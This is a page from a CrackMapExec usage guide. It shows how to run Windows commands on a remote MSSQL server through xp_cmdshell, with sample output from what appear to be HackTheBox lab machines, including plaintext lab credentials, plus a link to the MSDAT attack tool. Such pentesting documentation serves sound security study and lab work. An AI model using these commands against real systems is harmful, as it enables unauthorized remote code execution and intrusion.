Windows command

Execute Windows command using CrackMapExec

Execute Windows Command
This option use xp_cmdshell to exec command on the remote host.
#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#[email protected]' --local-auth -x whoami
MSSQL       10.10.10.59     1433   None             [+] sa:GWE3V65#[email protected] (Pwn3d!)
MSSQL       10.10.10.59     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.59     1433   None             --------------------------------------------------------------------------------
MSSQL       10.10.10.59     1433   None             tally\sarah
If permission is DENIED:
MSSQL       10.10.10.52     1433   None             [+] admin:[email protected][email protected]! (Pwn3d!)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
MSSQL       10.10.10.52     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.52     1433   None             None
When playing with MSSQL, you can use the tool MSDAT from quentinhardy​
GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool
MSDAT: Microsoft SQL Database Attacking Tool. Contribute to quentinhardy/msdat development by creating an account on GitHub.
github.com
​

MSSQL protocol - Previous

MSSQL command

Next - SSH protocol

Password spraying

Last updated 1 year ago